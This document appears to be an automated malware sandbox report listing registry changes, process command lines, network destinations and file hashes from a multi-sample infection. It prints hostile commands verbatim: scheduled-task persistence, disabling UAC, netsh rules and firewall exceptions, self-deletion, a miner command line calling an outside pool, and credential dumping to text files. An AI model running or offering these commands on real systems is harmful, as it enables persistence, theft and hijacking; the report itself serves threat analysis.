| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\mediaget.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\test.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{CC3CEE90-FC83-4AED-AF5B-78B42F7F7325}\aa-ca-f0-57-92-4a | C:\Windows\SysWOW64\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\aa-ca-f0-57-92-4a\WpadDecisionReason = "1" | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\SysWOW64\svchost.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\SysWOW64\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" | C:\Windows\SysWOW64\svchost.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f00a2000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\SysWOW64\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{CC3CEE90-FC83-4AED-AF5B-78B42F7F7325}\WpadDecision = "0" | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\aa-ca-f0-57-92-4a | C:\Windows\SysWOW64\svchost.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{CC3CEE90-FC83-4AED-AF5B-78B42F7F7325} | C:\Windows\SysWOW64\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{CC3CEE90-FC83-4AED-AF5B-78B42F7F7325}\WpadDecisionReason = "1" | C:\Windows\SysWOW64\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{CC3CEE90-FC83-4AED-AF5B-78B42F7F7325}\WpadNetworkName = "Network 3" | C:\Windows\SysWOW64\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\SysWOW64\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\SysWOW64\svchost.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{CC3CEE90-FC83-4AED-AF5B-78B42F7F7325}\WpadDecisionTime = d02dbac68046db01 | C:\Windows\SysWOW64\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | C:\Windows\SysWOW64\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad | C:\Windows\SysWOW64\svchost.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\aa-ca-f0-57-92-4a\WpadDecisionTime = d02dbac68046db01 | C:\Windows\SysWOW64\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\aa-ca-f0-57-92-4a\WpadDecision = "0" | C:\Windows\SysWOW64\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | C:\Windows\SysWOW64\svchost.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Opus.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\mediaget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Pluto Panel.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\TXPlatforn.exe | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\___11.19.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\___11.19.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\22.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\ProgramData\Start Menu\dllhost.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\ProgramData\Start Menu\dllhost.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\ProgramData\Start Menu\dllhost.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
Uses Task Scheduler COM API
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\aaa.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe
"C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe"
C:\Users\Admin\AppData\Roaming\healastounding.exe
"C:\Users\Admin\AppData\Roaming\healastounding.exe"
C:\Users\Admin\AppData\Roaming\Pluto Panel.exe
"C:\Users\Admin\AppData\Roaming\Pluto Panel.exe"
C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
"C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe"
C:\Users\Admin\AppData\Roaming\test.exe
"C:\Users\Admin\AppData\Roaming\test.exe"
C:\Users\Admin\AppData\Roaming\22.exe
"C:\Users\Admin\AppData\Roaming\22.exe"
C:\Users\Admin\AppData\Roaming\gay.exe
"C:\Users\Admin\AppData\Roaming\gay.exe"
C:\Users\Admin\AppData\Roaming\___11.19.exe
"C:\Users\Admin\AppData\Roaming\___11.19.exe"
C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
"C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe"
C:\Users\Admin\AppData\Roaming\Opus.exe
"C:\Users\Admin\AppData\Roaming\Opus.exe"
C:\Users\Admin\AppData\Roaming\aaa.exe
"C:\Users\Admin\AppData\Roaming\aaa.exe"
C:\Users\Admin\AppData\Local\Temp\svchost.exe
C:\Users\Admin\AppData\Local\Temp\\svchost.exe
C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe
"C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe"
C:\Users\Admin\AppData\Roaming\4.exe
"C:\Users\Admin\AppData\Roaming\4.exe"
C:\Users\Admin\AppData\Roaming\a.exe
"C:\Users\Admin\AppData\Roaming\a.exe"
C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe
"C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe"
C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe
"C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe"
C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe
"C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe"
C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe
"C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe"
C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe
"C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe"
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add policy name=Block
C:\Users\Admin\AppData\Roaming\3.exe
"C:\Users\Admin\AppData\Roaming\3.exe"
C:\Windows\SysWOW64\TXPlatforn.exe
C:\Windows\SysWOW64\TXPlatforn.exe -auto
C:\Windows\SysWOW64\TXPlatforn.exe
C:\Windows\SysWOW64\TXPlatforn.exe -acsi
C:\Users\Admin\AppData\Local\Temp\svchos.exe
C:\Users\Admin\AppData\Local\Temp\\svchos.exe
C:\Users\Admin\AppData\Roaming\HD____11.19.exe
C:\Users\Admin\AppData\Roaming\HD____11.19.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ping -n 2 127.0.0.1 > nul && del C:\Users\Admin\AppData\Local\Temp\svchost.exe > nul
C:\Windows\SysWOW64\schtasks.exe
"schtasks.exe" /create /f /tn "ISS Host" /xml "C:\Users\Admin\AppData\Local\Temp\tmpAA91.tmp"
C:\Windows\SysWOW64\svchost.exe
C:\Windows\SysWOW64\svchost.exe -k "Ö÷¶¯·ÀÓù·þÎñÄ£¿é"
C:\Windows\SysWOW64\svchost.exe
C:\Windows\SysWOW64\svchost.exe -k "Ö÷¶¯·ÀÓù·þÎñÄ£¿é"
C:\Users\Admin\AppData\Roaming\mediaget.exe
"C:\Users\Admin\AppData\Roaming\mediaget.exe"
C:\Windows\SysWOW64\PING.EXE
ping -n 2 127.0.0.1
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=Filter1
C:\Windows\SysWOW64\schtasks.exe
"schtasks.exe" /create /f /tn "ISS Host Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmpC5B0.tmp"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "0fd7de5367376231a788872005d7ed4f" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\0fd7de5367376231a788872005d7ed4f.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\sppsvc.exe'" /rl HIGHEST /f
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1420090574490970998-1514513884419101326-171104240-183127650733380225-1896207397"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Windows\System32\KBDVNTC\lsass.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "a" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb\a.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "TXPlatforn" /sc ONLOGON /tr "'C:\Recovery\209d6542-69f6-11ef-b491-62cb582c238c\TXPlatforn.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\ProgramData\Start Menu\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\Documents and Settings\taskhost.exe'" /rl HIGHEST /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ckwNq3q2sC.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\SysWOW64\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe
C:\Windows\system32\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe "c:\windows\system32\259437400.txt",MainThread
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP
C:\Windows\system32\wbem\WMIADAP.EXE
wmiadap.exe /F /T /R
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\mediaget.exe" "mediaget.exe" ENABLE
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=FilteraAtion1 action=block
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add rule name=Rule1 policy=Block filterlist=Filter1 filteraction=FilteraAtion1
C:\ProgramData\Start Menu\dllhost.exe
"C:\ProgramData\Start Menu\dllhost.exe"
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static set policy name=Block assign=y
C:\Windows\Help\Winlogon.exe
C:\Windows\Help\Winlogon.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c del "C:\Users\Admin\AppData\Roaming\22.exe"
C:\Windows\SysWOW64\svchost.exe
C:\Windows\system32\svchost.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2200 -s 216
C:\Windows\Cursors\WUDFhosts.exe
C:\Windows\Cursors\WUDFhosts.exe -o pool.usa-138.com:80 -u 4B7yFmYw2qvEtWZDDnZVeY16HHpwTtuYBg6EMn5xdDbM3ggSEnQFDWDHH6cqdEYaPx4iQvAwLNu8NLc21QxDU84GGxZEY7S -p x
C:\Users\Admin\AppData\Roaming\aaa.exe
"C:\Users\Admin\AppData\Roaming\aaa.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3048 -s 804
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\259457134.bat" "C:\Users\Admin\AppData\Roaming\aaa.exe" "
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"
Network
| Country | Destination | Domain | Proto |
| MD | 194.180.174.53:80 | tcp | |
| US | 8.8.8.8:53 | hackerinvasion.f3322.net | udp |
| US | 8.8.8.8:53 | pretorian.ac.ug | udp |
| MD | 194.180.174.53:80 | tcp | |
| CN | 59.56.110.231:8898 | tcp | |
| US | 8.8.8.8:53 | prepepe.ac.ug | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | gfhhjgh.duckdns.org | udp |
| RU | 80.87.192.115:80 | tcp | |
| CO | 179.13.1.253:8050 | gfhhjgh.duckdns.org | tcp |
| US | 8.8.8.8:53 | yabynennet.xyz | udp |
| US | 104.155.138.21:81 | yabynennet.xyz | tcp |
| US | 8.8.8.8:53 | pretorian.ac.ug | udp |
| US | 8.8.8.8:53 | whatismyipaddress.com | udp |
| HU | 91.219.236.18:80 | 91.219.236.18 | tcp |
| US | 104.19.222.79:80 | whatismyipaddress.com | tcp |
| US | 104.19.222.79:443 | whatismyipaddress.com | tcp |
| CA | 172.98.92.42:58491 | tcp | |
| US | 104.19.222.79:443 | whatismyipaddress.com | tcp |
| US | 8.8.8.8:53 | kazya1.hopto.org | udp |
| MD | 194.180.174.41:80 | tcp | |
| RU | 92.63.107.12:80 | tcp | |
| MD | 194.180.174.41:80 | tcp | |
| US | 8.8.8.8:53 | 22ssh.com | udp |
| HU | 91.219.236.148:80 | tcp | |
| US | 8.8.8.8:53 | pool.usa-138.com | udp |
| SG | 45.77.45.115:80 | pool.usa-138.com | tcp |
| HU | 91.219.236.148:80 | tcp | |
| CA | 172.98.92.42:58491 | tcp | |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| RU | 80.87.192.115:80 | tcp | |
| RU | 92.63.107.12:80 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| CO | 179.13.1.253:8050 | gfhhjgh.duckdns.org | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | files.000webhost.com | udp |
| CA | 172.98.92.42:58491 | tcp | |
| RU | 80.87.192.115:80 | tcp | |
| CO | 179.13.1.253:8050 | gfhhjgh.duckdns.org | tcp |
| N/A | 127.0.0.1:58491 | tcp | |
| N/A | 127.0.0.1:58491 | tcp | |
| RU | 80.87.192.115:80 | tcp | |
| N/A | 127.0.0.1:58491 | tcp | |
| CA | 172.98.92.42:58491 | tcp | |
| US | 8.8.8.8:53 | gfhhjgh.duckdns.org | udp |
| CO | 179.13.1.253:8050 | gfhhjgh.duckdns.org | tcp |
| RU | 80.87.192.115:80 | tcp | |
| CA | 172.98.92.42:58491 | tcp | |
| CO | 179.13.1.253:8050 | gfhhjgh.duckdns.org | tcp |
| CA | 172.98.92.42:58491 | tcp | |
| RU | 80.87.192.115:80 | tcp | |
| N/A | 127.0.0.1:58491 | tcp | |
| N/A | 127.0.0.1:58491 | tcp | |
| CO | 179.13.1.253:8050 | gfhhjgh.duckdns.org | tcp |
| RU | 80.87.192.115:80 | tcp | |
| N/A | 127.0.0.1:58491 | tcp | |
| CA | 172.98.92.42:58491 | tcp |
Files
memory/1364-0-0x0000000074921000-0x0000000074922000-memory.dmp
memory/1364-1-0x0000000074920000-0x0000000074ECB000-memory.dmp
memory/1364-2-0x0000000074920000-0x0000000074ECB000-memory.dmp
C:\Users\Admin\AppData\Roaming\healastounding.exe
| MD5 | 6fb798f1090448ce26299c2b35acf876 |
| SHA1 | 451423d5690cffa02741d5da6e7c45bc08aefb55 |
| SHA256 | b4f86ff48c5f6b01e0ad4543fb78e0435e81f3ec2aaca89866862157c0dacf4f |
| SHA512 | 9cc2421a2f3ab01d15be62a848947b03f1a8212cfd923573cf70f8c10bd8d124aee3b251828834236af291ea12450ac2580a712e53a022ce11b4d71b0357d8c3 |
\Users\Admin\AppData\Roaming\Pluto Panel.exe
| MD5 | ed666bf7f4a0766fcec0e9c8074b089b |
| SHA1 | 1b90f1a4cb6059d573fff115b3598604825d76e6 |
| SHA256 | d1330d349bfbd3aea545fa08ef63339e82a3f4d04e27216ecc4c45304f079264 |
| SHA512 | d0791eaa9859d751f946fd3252d2056c29328fc97e147a5234a52a3728588a3a1aaa003a8e32863d338ebdca92305c48b6fa12ca1e620cf27460bf091c3b6d49 |
C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
| MD5 | 0fd7de5367376231a788872005d7ed4f |
| SHA1 | 658e4d5efb8b14661967be2183cc60e3e561b2b6 |
| SHA256 | 9083992637e90e412e6f4e77331eb69ee8db821c54bbc38533e0f889cc4ca9dd |
| SHA512 | 522d5be2803fbce0d12c325cc2ef1e3a92cec03aeba7d1164530093ad58caecd827dd557ca3c182a66c6667150e731de37bb552d19425f96cc78fe3423e1a863 |
\Users\Admin\AppData\Roaming\Opus.exe
| MD5 | 759185ee3724d7563b709c888c696959 |
| SHA1 | 7c166cc3cbfef08bb378bcf557b1f45396a22931 |
| SHA256 | 9384798985672c356a8a41bf822443f8eb0d3747bfca148ce814594c1a894641 |
| SHA512 | ed754357b1b995de918af21fecd9d1464bdea6778f7ab450a34e3aae22ba7eebc02f2442af13774abfdf97954e419ec9e356b54506c7e3bf12e3b76ee882fa2c |
C:\Users\Admin\AppData\Roaming\aaa.exe
| MD5 | 860aa57fc3578f7037bb27fc79b2a62c |
| SHA1 | a14008fe5e1eb88bf46266de3d5ee5db2e0a722b |
| SHA256 | 5430565c4534b482c7216a0ae75d04e201ee0db0386682c0c010243083c28d29 |
| SHA512 | 6639b3e2594e554c7fa811f22e1c514474d34220155b4c989ad8716db1a0aea65894aa23d78c12a4618c57312da00353a77dd8e6c6bdd927bf865f2e98aff8f1 |
\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe
| MD5 | 8f1c8b40c7be588389a8d382040b23bb |
| SHA1 | bef5209ae90a3bd3171e1e0be4e8148c4ccd8a6a |
| SHA256 | ed58ffee46a583c177c792b56c9fc20ccd9509d125f2e3fc90c4f48de7e2c2a1 |
| SHA512 | 9192b6f2f8320a728c445f9cd6e6d66495ad0ebebd7ff193dc09ee8ae57b3933c1b75dc208e7d638db273cb9d31b4ca24ee7bfd9729ff0cdbf432d72bb322b1f |
C:\Windows\SysWOW64\TXPlatforn.exe
| MD5 | a4329177954d4104005bce3020e5ef59 |
| SHA1 | 23c29e295e2dbb8454012d619ca3f81e4c16e85a |
| SHA256 | 6156d003d54dcf2ee92f21bd6e7a6a7f91730bd2804381260bcabe465abe6ddd |
| SHA512 | 81e9d456a4abfc7cd9e0943d4a0ce15523362c3179f3368381d1d7974f80a9f9113b5404b96e67e91684e0ea1895b7d0073e4c48d0bfc4fd0244b1af6acf0208 |
C:\Users\Admin\AppData\Roaming\4.exe
| MD5 | e6dace3f577ac7a6f9747b4a0956c8d7 |
| SHA1 | 86c71169025b822a8dfba679ea981035ce1abfd1 |
| SHA256 | 8b4b846fe1023fa173ab410e3a5862a4c09f16534e14926878e387092e7ffb63 |
| SHA512 | 1c8554d3d9a1b1509ba1df569ede3fb7a081bef84394c708c4f1a2fb8779f012c74fbf6de085514e0c8debb5079cc23c6c6112b95bf2f0ab6a8f0bd156a3e268 |
\Users\Admin\AppData\Roaming\22.exe
| MD5 | dbf9daa1707b1037e28a6e0694b33a4b |
| SHA1 | ddc1fcec1c25f2d97c372fffa247969aa6cd35ef |
| SHA256 | a604a3ff78644533fac5ee9f198e9c5f2fa1ae2a5828186367a9e00935cff6b6 |
| SHA512 | 145b606ffd58554050ff8712ddb38c1c66dd5f33ea15fd48474e1c165b2c0348d2413e16c7ad07ff1c65ce71e2be23e3758e6d48c4f2454d5407982119706bfd |
C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe
| MD5 | 870d6e5aef6dea98ced388cce87bfbd4 |
| SHA1 | 2d7eee096d38d3c2a8f12fcba0a44b4c4da33d54 |
| SHA256 | 6d50833895b2e3eb9d6f879a6436660127c270b6a516cda0253e56a3d8b7fba0 |
| SHA512 | 0d55ab28b2f80136af121b870b7503551d87bbeb2848cf9a32540006cac9a5e346d9fcce2bf1223a22927f72a147b81487533a10b91373d4fa4429d6159fd566 |
memory/3048-160-0x0000000000400000-0x0000000000438000-memory.dmp
memory/1904-164-0x0000000000400000-0x00000000007C2000-memory.dmp
\Users\Admin\AppData\Roaming\3.exe
| MD5 | 748a4bea8c0624a4c7a69f67263e0839 |
| SHA1 | 6955b7d516df38992ac6bff9d0b0f5df150df859 |
| SHA256 | 220d8f8ff82d413c81bd02dfa001e1c478e8fbea44bad24f21b3a5284e15632e |
| SHA512 | 5fcdfddce3cc2e636001ed08c5f2f7590aadaa37c091f7ba94e519d298e284362721f1859c6ffbf064ae23e05d4e0e9754b515396812fbe9f9028497396799fd |
memory/1536-195-0x0000000000BD0000-0x0000000000C64000-memory.dmp
memory/2076-163-0x0000000000CA0000-0x0000000000CB2000-memory.dmp
C:\Users\Admin\AppData\Roaming\HD____11.19.exe
| MD5 | b14120b6701d42147208ebf264ad9981 |
| SHA1 | f3cff7ac8e6c1671d2c3387648e54f80957196de |
| SHA256 | d987bd57582a22dfc65901ff256eda635dc8dad598c93b200002130b87fcfd97 |
| SHA512 | 27a066b9d842acd7b1e0ca1dd045a9262b0d0a00c180eedeebeb9d3091925b184186fc3a1d2df28ae4c55626febe6abf6fdb5e26d45fd1a2968d57540e7cf29b |
